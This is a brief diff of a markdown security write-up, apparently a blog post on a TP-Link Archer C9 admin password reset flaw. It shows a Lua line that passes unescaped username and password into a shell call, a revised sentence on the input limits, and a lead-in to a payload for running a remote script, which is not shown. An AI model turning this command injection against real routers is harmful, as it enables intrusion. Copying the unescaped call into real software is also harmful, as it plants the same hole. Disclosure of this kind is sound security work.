Culhane/vakzz.github.io/_posts/2017-07-21-tp-link-archer-c9---admin-password-reset.markdown

 sys.call("usbuser " .. username .. " '" .. password .. "'")
 ```

-Username and password are unescaped, but are limited to 16 characters and can only contain length of 16 must be in the ascii range of 33-126.
+Username and password are unescaped, but are limited to 16 characters and must be in the ascii range of 33-126 (no spaces).

 After some more testing I found the following payload could be used to execute a remote script: